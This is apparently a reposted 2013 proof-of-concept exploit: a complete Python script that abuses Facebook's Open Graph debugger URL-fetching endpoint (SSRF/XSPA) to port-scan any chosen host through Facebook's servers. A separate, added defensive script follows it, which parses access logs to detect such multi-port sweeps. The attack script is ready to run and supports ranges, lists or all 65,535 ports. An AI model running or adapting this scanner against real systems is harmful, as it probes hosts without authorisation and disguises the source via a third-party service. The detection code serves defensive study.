XSPA / SSRF exploit script
2015-08-23 15:37
```python
#Author: Riyaz Ahemed Walikar

import sys
import requests
import time

useragent = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2'}

def portscan(port):
    # The target URL is passed, already percent-encoded, in the q parameter of the debugger endpoint.
    payload = {'q': 'http%3A%2F%2F' + str(ip) + '%3A' + str(port) + '%2Findex.html'}
    r = requests.get('http://developers.facebook.com/tools/debug/og/object', allow_redirects=False, params=payload, headers=useragent)
    if r.status_code == 200:
        data = r.text
        status = 'unknown'
        # check if response contains 503, which means port closed; anything else means it's open
        if data.find('>503</td>') > 1:
            status = 'Closed'
        else:
            status = 'Open'
        print(str(port) + ":" + status)

helpmsg = 'PoC for FB URL Port Scanning\nCreated by Riyaz Ahemed Walikar\n\nUsage: \
fbportscan.py <public_ip> <portrange|all|csv_ports>\n\nExample: xspafbportscanner.py scanme.nmap.org 20-3890\nExample: \
fbportscan.py scanme.nmap.org all\nExample: xspafbportscanner.py scanme.nmap.org 22,23,80,445,3389\n\nProvide valid external/internal public hostnames/ip.'

if len(sys.argv) < 3:
    print("Not enough parameters.\n")
    print(helpmsg)
    sys.exit()

ip = sys.argv[1]
portnum = sys.argv[2]

print('Starting portscan on ' + ip + ' using the Facebook URL: http://developers.facebook.com/tools/debug/og/object?q=\n')

# Port range, e.g. 20-3890
if portnum.find("-") > 1:
    startport = int(portnum.split("-")[0])
    endport = int(portnum.split("-")[1])
    for port in range(startport,endport+1):
        portscan(port)
    sys.exit()

# All ports
if str.upper(portnum) == "ALL":
    for port in range(1,65536):
        portscan(port)
    sys.exit()

# Comma-separated list of ports
if portnum.find(",") > 1:
    ports = portnum.split(",")
    for port in ports:
        portscan(port)
    sys.exit()

# Single port
if portnum.isdigit() == 1:
    if int(portnum) > 0 and int(portnum) < 65536:
        port = int(portnum)
        portscan(port)
        sys.exit()

print("Invalid parameters.\n")
print(helpmsg)
sys.exit()
```
Source: http://www.riyazwalikar.com/2013/05/xspa-ssrf-bug-with-facebooks-developer.html
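
From the defender's side, the script above sends one GET per port, each carrying a `q` value that has been percent-encoded twice (once by the script, once by the HTTP client). The following is an added example, not part of the original post: it finds that pattern in the access log of a URL-fetching endpoint. The log layout, the sample lines, the function names and the threshold are all assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines; the "client request status" layout is an assumption.
SWEEP = ['203.0.113.7 "GET /tools/debug/og/object?q=http%253A%252F%252F198.51.100.9'
         f'%253A{p}%252Findex.html HTTP/1.1" 200' for p in (21, 22, 23, 80)]
SAMPLE_LOG = SWEEP + [
    '192.0.2.44 "GET /tools/debug/og/object?q=https%3A%2F%2Fexample.com%2Fpost HTTP/1.1" 200',
    '192.0.2.44 "GET /tools/debug/og/object?q=https%3A%2F%2Fexample.com%2Fabout HTTP/1.1" 200',
]
LINE_RE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" \d{3}$')
DEFAULT_PORT = {"http": 80, "https": 443}

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so double-encoded targets are still parsed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def fetch_target(request_path, param="q"):
    """Return (host, port) of the URL the fetcher was asked to load, or None."""
    values = parse_qs(urlsplit(request_path).query).get(param)
    if not values:
        return None
    try:
        target = urlsplit(fully_decode(values[0]))
        port = target.port or DEFAULT_PORT.get(target.scheme)
    except ValueError:  # malformed URL or out-of-range port
        return None
    return (target.hostname, port) if target.hostname and port else None

def find_port_sweeps(lines, min_ports=4):
    """Map (client, target host) -> sorted ports when one client probes many ports of one host."""
    seen = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        target = fetch_target(m.group(2)) if m else None
        if target:
            seen[(m.group(1), target[0])].add(target[1])
    return {key: sorted(ports) for key, ports in seen.items() if len(ports) >= min_ports}

if __name__ == "__main__":
    for (client, host), ports in find_port_sweeps(SAMPLE_LOG).items():
        print(f"{client} asked the fetcher to probe {host} on ports {ports}")
```

Ordinary use of such an endpoint requests many paths on a single port, so counting distinct ports per (client, target host) pair separates it from a sweep.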